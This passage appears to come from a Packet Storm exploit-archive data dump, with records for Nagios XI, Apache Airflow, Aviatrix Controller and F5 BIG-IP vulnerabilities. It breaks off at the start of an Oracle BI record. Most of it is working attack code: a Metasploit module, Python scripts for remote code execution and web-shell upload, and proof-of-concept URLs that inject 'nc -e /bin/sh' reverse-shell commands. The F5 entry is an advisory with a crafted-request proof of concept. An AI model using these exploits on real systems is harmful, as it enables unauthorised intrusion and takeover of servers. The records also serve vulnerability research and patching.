"cvelist": ["CVE-2021-25296", "CVE-2021-25297", 
"CVE-2021-25298"], "modified": "2023-02-08T00:00:00", "id": "PACKETSTORM:170924", "href": "https://packetstormsecurity.com/files/170924/Nagios-XI-5.7.5-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::HTTP::NagiosXi \ninclude Msf::Exploit::CmdStager \nprepend Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Exection', \n'Description' => %q{ \nThis module exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298, which are \nOS command injection vulnerabilities in the windowswmi, switch, and cloud-vm \nconfiguration wizards that allow an authenticated user to perform remote code \nexecution on Nagios XI versions 5.5.6 to 5.7.5 as the apache user. \n \nValid credentials for a Nagios XI user are required. This module has \nbeen successfully tested against official NagiosXI OVAs from 5.5.6-5.7.5. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Matthew Mathur' \n], \n'References' => [ \n['CVE', '2021-25296'], \n['CVE', '2021-25297'], \n['CVE', '2021-25298'], \n['URL', 'https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md'] \n], \n'Platform' => %w[linux unix], \n'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ], \n'Targets' => [ \n[ \n'Linux (x86)', { \n'Arch' => [ ARCH_X86 ], \n'Platform' => 'linux', \n'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' } \n} \n], \n[ \n'Linux (x64)', { \n'Arch' => [ ARCH_X64 ], \n'Platform' => 'linux', \n'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } \n} \n], \n[ \n'CMD', { \n'Arch' => [ ARCH_CMD ], \n'Platform' => 'unix', \n# the only reliable payloads against a typical Nagios XI host (CentOS 7 minimal) seem to be cmd/unix/reverse_perl_ssl and cmd/unix/reverse_openssl \n'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl_ssl' } \n} \n] \n], \n'Privileged' => false, \n'DefaultTarget' => 2, \n'DisclosureDate' => '2021-02-13', \n'Notes' => { \n'Stability' => [ CRASH_SAFE ], \n'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], \n'Reliability' => [ REPEATABLE_SESSION ] \n} \n) \n) \n \nregister_options [ \nOptString.new('TARGET_CVE', [true, 'CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298)', 'CVE-2021-25296']) \n] \nend \n \ndef username \ndatastore['USERNAME'] \nend \n \ndef password \ndatastore['PASSWORD'] \nend \n \ndef finish_install \ndatastore['FINISH_INSTALL'] \nend \n \n# Returns a status code an a error message on failure. \n# On success returns the status code and an array so we \n# can update the login_result and res_array variables appropriately. 
\ndef handle_unsigned_license(res_array, username, password, finish_install) \nauth_cookies, nsp = res_array \nsign_license_result = sign_license_agreement(auth_cookies, nsp) \nif sign_license_result \nreturn 5, 'Failed to sign license agreement' \nend \n \nprint_status('License agreement signed. The module will wait for 5 seconds and retry the login.') \nsleep 5 \nlogin_result, res_array = login_after_install_or_license(username, password, finish_install) \ncase login_result \nwhen 1..4 # An error occurred, propagate the error message \nreturn login_result, res_array[0] \nwhen 5 # The Nagios XI license agreement still has not been signed \nreturn 5, 'Failed to sign the license agreement.' \nend \n \nreturn login_result, res_array \nend \n \ndef authenticate \n# Use nagios_xi_login to try and authenticate. \nlogin_result, res_array = nagios_xi_login(username, password, finish_install) \ncase login_result \nwhen 1..3 # An error occurred, propagate the error message \nreturn login_result, res_array[0] \nwhen 4 # Nagios XI is not fully installed \ninstall_result = install_nagios_xi(password) \nif install_result # On installation failure, result is an array with the code and error message \nreturn install_result[0], install_result[1] \nend \n \nlogin_result, res_array = login_after_install_or_license(username, password, finish_install) \ncase login_result \nwhen 1..4 # An error occurred, propagate the error message \nreturn login_result, res_array[0] \nwhen 5 # The license agreement still needs to be signed \nlogin_result, res_array = handle_unsigned_license(res_array, username, password, finish_install) \nreturn login_result, res_array unless (login_result == 0) \nend \nwhen 5 # The license agreement still needs to be signed \nlogin_result, res_array = handle_unsigned_license(res_array, username, password, finish_install) \nreturn login_result, res_array unless (login_result == 0) \nend \n \nprint_good('Successfully authenticated to Nagios XI.') \n# Extract the 
authenticated cookies and nsp to use throughout the module \nif res_array.length == 2 \nauth_cookies = res_array[1] \nif auth_cookies && /nagiosxi=[a-z0-9]+;/.match(auth_cookies) \n@auth_cookies = auth_cookies \nelse \nreturn login_result, 'Failed to extract authentication cookies' \nend \nnsp = res_array[0].match(/nsp_str = \"([a-z0-9]+)/) \nif nsp \n@nsp = nsp[1] \nelse \nreturn login_result, 'Failed to extract nsp string' \nend \nelse \nreturn login_result, 'Failed to extract auth cookies and nsp string' \nend \n \n# Set the version here so both check and exploit can use it \nnagios_version = nagios_xi_version(res_array[0]) \nif nagios_version.nil? \nreturn 6, 'Unable to obtain the Nagios XI version from the dashboard' \nend \n \nprint_status(\"Target is Nagios XI with version #{nagios_version}.\") \n \n# Versions of NagiosXI pre-5.2 have different formats (5r1.0, 2014r2.7, 2012r2.8b, etc.) that Rex cannot handle, \n# so we set pre-5.2 versions to 1.0.0 for easier Rex comparison because the module only works on post-5.2 versions. \nif /^\\d{4}r\\d(?:\\.\\d)?(?:(?:RC\\d)|(?:[a-z]{1,3}))?$/.match(nagios_version) || nagios_version == '5r1.0' \nnagios_version = '1.0.0' \nend \n@version = Rex::Version.new(nagios_version) \n \nreturn 0, 'Successfully authenticated and retrieved NagiosXI Version.' 
\nend \n \ndef check \n# Authenticate to ensure we can access the NagiosXI version \nauth_result, err_msg = authenticate \ncase auth_result \nwhen 1 \nreturn CheckCode::Unknown(err_msg) \nwhen 2, 4, 5, 6 \nreturn CheckCode::Detected(err_msg) \nwhen 3 \nreturn CheckCode::Safe(err_msg) \nend \n \nif @version >= Rex::Version.new('5.5.6') && @version <= Rex::Version.new('5.7.5') \nreturn CheckCode::Appears \nend \n \nreturn CheckCode::Safe \nend \n \ndef execute_command(cmd, _opts = {}) \nif !@nsp || !@auth_cookies # Check to see if we already authenticated during the check \nauth_result, err_msg = authenticate \ncase auth_result \nwhen 1 \nfail_with(Failure::Disconnected, err_msg) \nwhen 2, 4, 5, 6 \nfail_with(Failure::UnexpectedReply, err_msg) \nwhen 3 \nfail_with(Failure::NotVulnerable, err_msg) \nend \nend \n \n# execute payload based on the selected targeted configuration wizard \nurl_params = { \n'update' => 1, \n'nsp' => @nsp \n} \n# After version 5.5.7, the URL parameter used in CVE-2021-25297 and CVE-2021-25298 \n# changes from address to ip_address \nif @version <= Rex::Version.new('5.5.7') \naddress_param = 'address' \nelse \naddress_param = 'ip_address' \nend \n \n# CVE-2021-25296 affects the windowswmi configuration wizard. \nif datastore['TARGET_CVE'] == 'CVE-2021-25296' \nurl_params = url_params.merge({ \n'nextstep' => 3, \n'wizard' => 'windowswmi', \n'ip_address' => Array.new(4) { rand(256) }.join('.'), \n'domain' => Rex::Text.rand_text_alphanumeric(7..15), \n'username' => Rex::Text.rand_text_alphanumeric(7..20), \n'password' => Rex::Text.rand_text_alphanumeric(7..20), \n'plugin_output_len' => Rex::Text.rand_text_numeric(5) + \"; #{cmd};\" \n}) \n# CVE-2021-25297 affects the switch configuration wizard. 
\nelsif datastore['TARGET_CVE'] == 'CVE-2021-25297' \nurl_params = url_params.merge({ \n'nextstep' => 3, \n'wizard' => 'switch', \naddress_param => Array.new(4) { rand(256) }.join('.') + \"\\\"; #{cmd};\", \n'snmpopts[snmpcommunity]' => Rex::Text.rand_text_alphanumeric(7..15), \n'scaninterfaces' => 'on' \n}) \n# CVE-2021-25298 affects the cloud-vm configuration wizard, which we can access by \n# specifying the digitalocean option for the wizard parameter. \nelsif datastore['TARGET_CVE'] == 'CVE-2021-25298' \nurl_params = url_params.merge({ \naddress_param => Array.new(4) { rand(256) }.join('.') + \"; #{cmd};\", \n'nextstep' => 4, \n'wizard' => 'digitalocean' \n}) \nelse \nfail_with(Failure::BadConfig, 'Invalid TARGET_CVE: Choose CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298.') \nend \n \nprint_status('Sending the payload...') \n# Send the final request. Note that the target is not expected to respond if we get \n# code execution. Therefore, we set the timeout on this request to 0. \nsend_request_cgi({ \n'method' => 'GET', \n'uri' => '/nagiosxi/config/monitoringwizard.php', \n'cookie' => @auth_cookies, \n'vars_get' => url_params \n}) \nend \n \ndef exploit \nif target.arch.first == ARCH_CMD \nexecute_command(payload.encoded) \nelse \nexecute_cmdstager(background: true) \nend \nend \nend \n`\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/170924/nagios_xi_configwizards_authenticated_rce.rb.txt"}, {"lastseen": "2021-02-26T16:40:53", "description": "", "cvss3": {}, "published": "2021-02-26T00:00:00", "type": "packetstorm", "title": "Nagios XI 5.7.5 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-25296", "CVE-2021-25297", "CVE-2021-25298", "CVE-2021-25299"], "modified": "2021-02-26T00:00:00", "id": "PACKETSTORM:161561", "href": "https://packetstormsecurity.com/files/161561/Nagios-XI-5.7.5-Remote-Code-Execution.html", "sourceData": "`# 
nagios-xi-5.7.5-bugs \nBugs reported to Nagios XI \n \n \n## CVE-2021-25296 \n \n### Code Location \n \n`/usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php` \n \n### Code snippet \n \n```php \nif (!empty($plugin_output_len)) { \n$disk_wmi_command .= \" --forcetruncateoutput \" . $plugin_output_len; \n$service_wmi_command .= \" --forcetruncateoutput \" . $plugin_output_len; \n$process_wmi_command .= \" --forcetruncateoutput \" . $plugin_output_len; \n} \necho $disk_wmi_command; \n// Run the WMI plugin to get realtime info \nexec($disk_wmi_command, $disk_output, $disk_return_var); \nexec($service_wmi_command, $service_output, $service_return_var); \nexec($process_wmi_command, $process_output, $process_return_var); \n``` \n \n### POC (Works with admin/non-admin authentication) \n \n`https://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=50c0f98fe9018dc43c81672ad1aeed5fd3f9710f013381519e553f846b5c2a86&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&plugin_output_len=&ip_address=127.0.0.1&domain=127.0.0.1&username=asdf&password=asdf&auth_file=&plugin_output_len=1024; nc -e /bin/sh 127.0.0.1 4444;&submitButton2=` \n \nThe `plugin_output_len` variable here is not sanitized and can give `command execution`. 
Eg: `plugin_output_len=1024; nc -e /bin/sh 127.0.0.1 4444;` \n \n \n## CVE-2021-25297 \n \n### Code Location \n \n`/usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php` \n \n### Code Snippet \n \n```php \nfunction switch_configwizard_add_cfg_to_mrtg($address) \n{ \n// get the data that we need \n$mrtg_confd_dir = \"/etc/mrtg/conf.d\"; \necho $address; \n$mrtg_cfg_file = \"{$address}.cfg\"; \n$absolute_mrtg_cfg_file = \"{$mrtg_confd_dir}/{$mrtg_cfg_file}\"; \n$cfgmaker_file = switch_configwizard_get_walk_file($address); \n// check if the file already exists for useful debugging \n$mrtg_confd_contents = scandir($mrtg_confd_dir); \necho \"REACHED HERE1\"; \nif (in_array($mrtg_cfg_file, $mrtg_confd_contents)) { \ndebug(\"{$mrtg_cfg_file} exists in {$mrtg_confd_dir}, overwriting\"); \n} else { \ndebug(\"{$mrtg_cfg_file} does not exist in {$mrtg_confd_dir}, creating\"); \n} \necho \"REACHED HERE2\"; \n// copy the cfgmaker file to the mrtg cfg destination \necho $cfgmaker_file; \necho $absolute_mrtg_cfg_file; \nif (!copy($cfgmaker_file, $absolute_mrtg_cfg_file)) { \ndebug(\"Unable to copy from {$cfgmaker_file} to {$absolute_mrtg_cfg_file}\"); \nreturn false; \n} \necho \"REACHED HERE3\"; \necho $absolute_mrtg_cfg_file; \n// add some meta info to the file \n$infoline = \"#### ADDED BY NAGIOSXI (User: \". get_user_attr(0, 'username') .\", DATE: \". 
get_datetime_string(time()) .\") ####\\n\"; \nexec(\"sed -i '1s|.*|{$infoline}&|' $absolute_mrtg_cfg_file\"); \n \nreturn true; \n} \n``` \n \n### POC (Works with admin/non-admin authentication) \n \n``` \nhttps://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=4e4f78ca5c24c7c526dc86b23092b81c3231a7bf59e1eb67f9918b8daf7b6de9&nextstep=3&wizard=switch&ip_address=127.0.0.1;nc -e /bin/sh 127.0.0.1 4445;&port=161&snmpversion=2c&snmpopts%5Bsnmpcommunity%5D=public&snmpopts%5Bv3_security_level%5D=authPriv&snmpopts%5Bv3_username%5D=&snmpopts%5Bv3_auth_password%5D=&snmpopts%5Bv3_auth_proto%5D=MD5&snmpopts%5Bv3_priv_password%5D=&snmpopts%5Bv3_priv_proto%5D=DES&portnames=number&scaninterfaces=on&bulk_fields%5B%5D=ip_address&bulk_fields%5B%5D=&bulk_fields%5B%5D=&bulk_options=&bulk_fields%5B%5D=&bulk_fields%5B%5D=&warn_speed_in_percent=50&crit_speed_in_percent=80&warn_speed_out_percent=50&crit_speed_out_percent=80&default_port_speed=100&submitButton2= \n``` \n \nThe `ip_address` variable here is not sanitized and can give `command execution`. 
Eg: `ip_address=1024; nc -e /bin/sh 127.0.0.1 4444;` \n \n \n## CVE-2021-25298 \n \n### Code path \n \n`/usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php` \n \n### Code Snippet \n \n```php \ncase CONFIGWIZARD_MODE_GETSTAGE2HTML: \n \n// echo (\"reached here ============================\"); \n// Get variables that were passed to us \n$address = grab_array_var($inargs, \"ip_address\", \"\"); // [User input] \n$port = grab_array_var($inargs, \"port\", \"\"); \n$token = grab_array_var($inargs, \"token\", \"\"); \n$no_ssl_verify = grab_array_var($inargs, \"no_ssl_verify\", 1); \n$hostname = grab_array_var($inargs, 'hostname', gethostbyaddr($address)); \n$default_mem_units = grab_array_var($inargs, 'default_mem_units', 'Gi'); \n$tcp_check_port = grab_array_var($inargs, 'tcp_check_port', '5693'); \n$rp_address = nagiosccm_replace_user_macros($address); \n$rp_port = nagiosccm_replace_user_macros($port); \n$rp_token = nagiosccm_replace_user_macros($token); \n$services_serial = grab_array_var($inargs, \"services_serial\", \"\"); \nif ($services_serial) { \n$services = unserialize(base64_decode($services_serial)); \n} \n// echo $rp_address; \n$not_used = array(); \n$return_code = 0; \n$alternative_host_check = false; \nexec('ping -W 2 -c 1 ' . $rp_address, $not_used, $return_code); // [Bug here] \n``` \n \n### POC (Works with admin/non-admin authentication) \n \n``` \nhttps://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=e2401df06a3892ba612df20e1ce2f559d7647c4b5fcba7f64c23c0ea9df1564f&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1;nc -e /bin/sh 127.0.0.1 4445;&port=5693&token=123&submitButton2= \n``` \n \nThe `ip_address` variable here is not sanitized and can give `command execution`. 
Eg: `ip_address=1024; nc -e /bin/sh 127.0.0.1 4444;` \n \n \n## CVE-2021-25299 \n \n### Code Location \n \n`/usr/local/nagiosxi/html/admin/sshterm.php` \n \n### Code Snippet \n \n```php+HTML \n<?php if ($efe) { ?> \n<iframe src=\"<?php echo $url; ?>\" style=\"width: 50%; min-width: 600px; height: 500px;\"></iframe> \n<?php } else { ?> \n<div style=\"color: #FFF; font-size: 14px; font-family: consolas, courier-new; background-color: #000; padding: 2px 6px; overflow-y: scroll; width: 50%; min-width: 600px; height: 500px;\">Enterprise features must be enabled</div> \n<?php \n} \n``` \n \n### POC \n \n`https://10.0.2.15/nagiosxi/admin/sshterm.php?url=javascript:alert(1)` \n \nThe `url` variable is not sanitized and can give `xss` . \n \n`\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/161561/nagiosxi575-exec.txt"}, {"lastseen": "2021-06-02T13:48:44", "description": "", "cvss3": {}, "published": "2021-06-02T00:00:00", "type": "packetstorm", "title": "Apache Airflow 1.10.10 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-11978", "CVE-2020-13927"], "modified": "2021-06-02T00:00:00", "id": "PACKETSTORM:162908", "href": "https://packetstormsecurity.com/files/162908/Apache-Airflow-1.10.10-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Apache Airflow 1.10.10 - 'Example Dag' Remote Code Execution \n# Date: 2021-06-02 \n# Exploit Author: Pepe Berba \n# Vendor Homepage: https://airflow.apache.org/ \n# Software Link: https://airflow.apache.org/docs/apache-airflow/stable/installation.html \n# Version: <= 1.10.10 \n# Tested on: Docker apache/airflow:1.10 .10 (https://github.com/pberba/CVE-2020-11978/blob/main/docker-compose.yml) \n# CVE : CVE-2020-11978 \n# \n# This is a proof of concept for CVE-2020-11978, a RCE vulnerability in one of the example DAGs shipped with airflow \n# This combines with CVE-2020-13927 where unauthenticated requests to 
Airflow's Experimental API were allowded by default. \n# Together, potentially allows unauthenticated RCE to Airflow \n# \n# Repo: https://github.com/pberba/CVE-2020-11978 \n# More information can be found here: \n# https://lists.apache.org/thread.html/r23a81b247aa346ff193670be565b2b8ea4b17ddbc7a35fc099c1aadd%40%3Cdev.airflow.apache.org%3E \n# https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E \n# \n# Remediation: \n# For CVE-2020-13927 make sure that the config `[api]auth_backend = airflow.api.auth.backend.deny_all` or has auth set. \n# For CVE-2020-11978 use 1.10.11 or set `load_examples=False` when initializing Airflow. You can also manually delete example_trigger_target_dag DAG. \n# \n# Example usage: python CVE-2020-11978.py http://127.0.0.1:8080 \"touch test\" \n \nimport argparse \nimport requests \nimport sys \nimport time \n \ndef create_dag(url, cmd): \nprint('[+] Checking if Airflow Experimental REST API is accessible...') \ncheck = requests.get('{}/api/experimental/test'.format(url)) \n \nif check.status_code == 200: \nprint('[+] /api/experimental/test returned 200' ) \nelse: \nprint('[!] /api/experimental/test returned {}'.format(check.status_code)) \nprint('[!] Airflow Experimental REST API not be accessible') \nsys.exit(1) \n \ncheck_task = requests.get('{}/api/experimental/dags/example_trigger_target_dag/tasks/bash_task'.format(url)) \nif check_task.status_code != 200: \nprint('[!] Failed to find the example_trigger_target_dag.bash_task') \nprint('[!] Host isn\\'t vunerable to CVE-2020-11978') \nsys.exit(1) \nelif 'dag_run' in check_task.json()['env']: \nprint('[!] example_trigger_target_dag.bash_task is patched') \nprint('[!] 
Host isn\\'t vunerable to CVE-2020-11978') \nsys.exit(1) \nprint('[+] example_trigger_target_dag.bash_task is vulnerable') \n \nunpause = requests.get('{}/api/experimental/dags/example_trigger_target_dag/paused/false'.format(url)) \nif unpause.status_code != 200: \nprint('[!] Unable to enable example_trigger_target_dag. Example dags were not loaded') \nsys.exit(1) \nelse: \nprint('[+] example_trigger_target_dag was enabled') \n \nprint('[+] Creating new DAG...') \nres = requests.post( \n'{}/api/experimental/dags/example_trigger_target_dag/dag_runs'.format(url), \njson={ \n'conf': { \n'message': '\"; {} #'.format(cmd) \n} \n} \n) \n \nif res.status_code == 200: \nprint('[+] Successfully created DAG') \nprint('[+] \"{}\"'.format(res.json()['message'])) \nelse: \nprint('[!] Failed to create DAG') \nsys.exit(1) \n \nwait_url = '{url}/api/experimental/dags/example_trigger_target_dag/dag_runs/{execution_date}/tasks/bash_task'.format( \nurl = url, \nexecution_date=res.json()['execution_date'] \n) \n \nstart_time = time.time() \nprint('[.] Waiting for the scheduler to run the DAG... This might take a minute.') \nprint('[.] If the bash task is never queued, then the scheduler might not be running.') \nwhile True: \ntime.sleep(10) \nres = requests.get(wait_url) \nstatus = res.json()['state'] \nif status == 'queued': \nprint('[.] Bash task queued...') \nelif status == 'running': \nprint('[+] Bash task running...') \nelif status == 'success': \nprint('[+] Bash task successfully ran') \nbreak \nelif status == 'None': \nprint('[-] Bash task is not yet queued...'.format(status)) \nelse: \nprint('[!] 
Bash task was {}'.format(status)) \nsys.exit(1) \n \nreturn 0 \n \n \ndef main(): \narg_parser = argparse.ArgumentParser() \narg_parser.add_argument('url', type=str, help=\"Base URL for Airflow\") \narg_parser.add_argument('command', type=str) \nargs = arg_parser.parse_args() \n \ncreate_dag( \nargs.url, \nargs.command \n) \n \nif __name__ == '__main__': \nmain() \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/162908/apacheairflow11010-exec.txt"}, {"lastseen": "2021-10-11T14:33:21", "description": "", "cvss3": {}, "published": "2021-10-11T00:00:00", "type": "packetstorm", "title": "Aviatrix Controller 6.x Path Traversal / Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-40870"], "modified": "2021-10-11T00:00:00", "id": "PACKETSTORM:164461", "href": "https://packetstormsecurity.com/files/164461/Aviatrix-Controller-6.x-Path-Traversal-Code-Execution.html", "sourceData": "`#!/usr/bin/env python3 \nimport requests \nfrom requests.structures import CaseInsensitiveDict \nfrom colorama import Fore, Style \nimport argparse \nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning \nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning) \nprint(f\"\"\" \n \n\u2591\u2588\u2580\u2580\u2588 \u2591\u2588\u2500\u2500\u2591\u2588 \u2591\u2588\u2580\u2580\u2580 \u2500\u2500 \u2588\u2580\u2588 \u2588\u2580\u2580\u2588 \u2588\u2580\u2588 \u2584\u2588\u2500 \u2500\u2500 \u2500\u2588\u2580\u2588\u2500 \u2588\u2580\u2580\u2588 \u2584\u2580\u2580\u2584 \u2584\u2580\u2580\u2584 \u2588\u2580\u2580\u2588 \n\u2591\u2588\u2500\u2500\u2500 \u2500\u2591\u2588\u2591\u2588\u2500 \u2591\u2588\u2580\u2580\u2580 \u2580\u2580 \u2500\u2584\u2580 \u2588\u2584\u2580\u2588 \u2500\u2584\u2580 \u2500\u2588\u2500 \u2580\u2580 \u2588\u2584\u2584\u2588\u2584 \u2588\u2584\u2580\u2588 \u2584\u2580\u2580\u2584 \u2588\u2584\u2584\u2500 \u2588\u2584\u2580\u2588 
\n\u2591\u2588\u2584\u2584\u2588 \u2500\u2500\u2580\u2584\u2580\u2500 \u2591\u2588\u2584\u2584\u2584 \u2500\u2500 \u2588\u2584\u2584 \u2588\u2584\u2584\u2588 \u2588\u2584\u2584 \u2584\u2588\u2584 \u2500\u2500 \u2500\u2500\u2500\u2588\u2500 \u2588\u2584\u2584\u2588 \u2580\u2584\u2584\u2580 \u2580\u2584\u2584\u2580 \u2588\u2584\u2584\u2588 \nAuthor : 0xJoyGhosh \nOrg : System00 Security \nTwitter: @0xjoyghosh \n \n\"\"\") \ntry: \nparser = argparse.ArgumentParser() \nparser.add_argument(\"-u\", \"--url\", help=\"Enter Target Url With scheme Ex: -u https://avaitix.target.com\", type=str) \nparser.add_argument(\"-c\", \"--code\", help=\"Enter php code Ex: -c '<?php phpinfo(); ?>' \", type=str) \nparser.add_argument(\"-n\", \"--name\", help=\"Enter php code Ex: -n 'filename' \", type=str) \nargs = parser.parse_args() \nurl =f\"{args.url}/v1/backend1\" \nexcept TypeError: \nprint(\"Type -h To See all the options\") \nexcept(): \nexit() \ndef exploit(url,path,code): \nheaders = CaseInsensitiveDict() \nheaders[\"Content-Type\"] = \"application/x-www-form-urlencoded\" \ndata = f'CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{path}.php&data={code}' \nresp = requests.post(url, headers=headers, data=data,verify=False) \nstat = requests.get(f\"{args.url}/v1/{path}\",verify=False) \nif resp.status_code==200: \nif stat.status_code==200: \nprint(f\"[ {Fore.RED} Exploited {Fore.BLACK}] [{Fore.GREEN}{args.url}/v1/{path}{Fore.BLACK} ]\") \nprint(\"\") \nelse: \nprint(\"[ Exploit successful Creating File Failed ]\") \npass \nelse: \nprint(f'[{Fore.BLUE} Exploit Unsuccessful {Fore.BLUE}]') \n \nif args.url is not None: \nif args.code is not None: \nif args.name is not None: \nexploit(url,args.name,args.code) \nelse: \nprint('Type -h to see help Menu') \nelse: \nprint('Type -h to see help Menu') \nelse: \nprint('Type -h to see help Menu') \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": 
"https://packetstormsecurity.com/files/download/164461/CVE-2021-40870.py.txt"}, {"lastseen": "2021-03-11T15:12:56", "description": "", "cvss3": {}, "published": "2021-03-11T00:00:00", "type": "packetstorm", "title": "F5 Big IP TMM uri_normalize_host Information Disclosure / Out-Of-Bounds Write", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-22991"], "modified": "2021-03-11T00:00:00", "id": "PACKETSTORM:161752", "href": "https://packetstormsecurity.com/files/161752/F5-Big-IP-TMM-uri_normalize_host-Information-Disclosure-Out-Of-Bounds-Write.html", "sourceData": "`F5 Big IP - TMM uri_normalize_host infoleak and out-of-bounds write \n \nBig IP's Traffic Management Microkernels (TMM) URI normalization incorrectly handles invalid IPv6 hostnames: \n \nWhen uri_normalize_host is called with a hostname of the form \\u\"[abcdef]\\u\", uri_norm_inet6 is called \nwith the substring abcdef as an argument. Pseudo code of this function is shown below: \n \nint uri_norm_inet6(char *inbuf, int64_t inlen, char *outbuf, _DWORD *outlen) { \nstruct in6_addr s; unsigned int ret; \n \nret = uri_inet6_pton(inbuf, inlen, &s); if ( !ret ) { \nif ( inet_ntop(AF_INET6, &s, outbuf, 46u) ) *outlen = strlen(outbuf); \nelse ret = 3; \n} return ret; \n} \n \nThe s hostname is first passed to uri_inet6_pton, which is responsible for parsing a text IPv6 \naddress and initializing the network address structure s. If the function doesn't return an error, \ninet_ntop is called to turn s back into a printable (and normalized) string. \n \nThe bug is that uri_inet6_pton incorrectly handles short hostnames. When a single hex character is \npassed to the function, it will only initialize the first two bytes of the in6_addr structure \nwithout returning an error. This means inet_ntop will now happily convert uninitialized stack memory \ninto a printable IPv6 hostname. 
\n \nWhile this could already be a security vulnerability if the normalized hostname becomes visible to \nthe attacker, it also breaks one of the core assumptions of callers of uri_normalize: Under normal \ncircumstances, a normalized URL should never be longer than 3*input_length + 2 (this handles the \nworst case scenario of URL encoding every character in the URL + adding slashes). This means callers \ncan just allocate an outbuf buffer with this size and the URI normalization functions do not have to \nperform any length checks. \n \nHowever, due to the described bug, the size invariant does not hold anymore leading to a \nstraightforward out-of-bound write. \n \nTMM's URI normalization is used in a number of places. Luckily most of them do not perform \nnormalization on the hostname allowing them to avoid this bug. \n \nHowever, there are a couple of configurations that can expose this bug to an attacker. (This list is \nbased on static analysis as I don't have a test environment where I can verify all variants) iRules \nor BIG-IP LTM policies that use the \\\"normalize URI\\\" config option URL categorization as part of APM, \nSWG or PEM Risk Classification \n \nProof of Concept: \n \nFor a server configured with the following iRule: \nwhen HTTP_REQUEST { \nlog local0. \\\"normalized: [HTTP::uri -normalized]\\\" \nlog local0. \\\"uri: [HTTP::uri]\\\" } \n \nSend a request like this: echo -e \\\"GET h://[f] HTTP/1.1\\\\ \n\\\\ \n\\\" | ncat --ssl 10.154.0.3 443 \n \nThis will log uninitialized memory to /var/log/ltm on the F5 host: \nDec 10 09:41:32 f5-16-vm info tmm[26669]: Rule /Common/normalized <HTTP_REQUEST>: normalized: h://[aa:cf01::c00:0:1100:0]/ \nDec 10 09:41:32 f5-16-vm info tmm[26669]: Rule /Common/normalized <HTTP_REQUEST>: uri: h://[aa] \n \nFor debug TMM's using `wrapped_umem_alloc` for heap allocations, it will also lead to a direct \ncrash of the TMM due to the heap buffer overflow. \n \nThis bug is subject to a 90 day disclosure deadline. 
After 90 days elapse, \nthe bug report will become visible to the public. The scheduled disclosure \ndate is 2021-03-10. Disclosure at an earlier date is also possible if \nagreed upon by all parties. \n \nCredit Information: \n \nFelix Wilhelm of Google Project Zero \n \nRelated CVE Numbers: CVE-2021-22991. \n \n \n \nFound by: fwilhelm@google.com \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161752/GS20210311143641.txt"}, {"lastseen": "2020-10-28T16:50:20", "description": "", "cvss3": {}, "published": "2020-10-28T00:00:00", "type": "packetstorm", "title": "Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 LFI", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-14864"], "modified": "2020-10-28T00:00:00", "id": "PACKETSTORM:159748", "href": "https://packetstormsecurity.com/files/159748/Oracle-Business-Intelligence-Enterprise-Edition-5.5.0.0.0-12.2.1.3.0-12.2.1.4.0-LFI.html", "sourceData": "`# Exploit Title: Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion \n# Date: 2020-10-27 \n# Exploit Author: Ivo Palazzolo (@palaziv) \n# Reference: https://www.oracle.com/security-alerts/cpuoct2020.html \n# Vendor Homepage: https://www.oracle.com \n# Software Link: https://www.oracle.com/middleware/technologies/bi-enterprise-edition-downloads.html \n# Version: 5.5.0.0.0, 12.2.1.3.0, 12.2.1.4.0 \n# Tested on: SUSE Linux Enterprise Server \n# 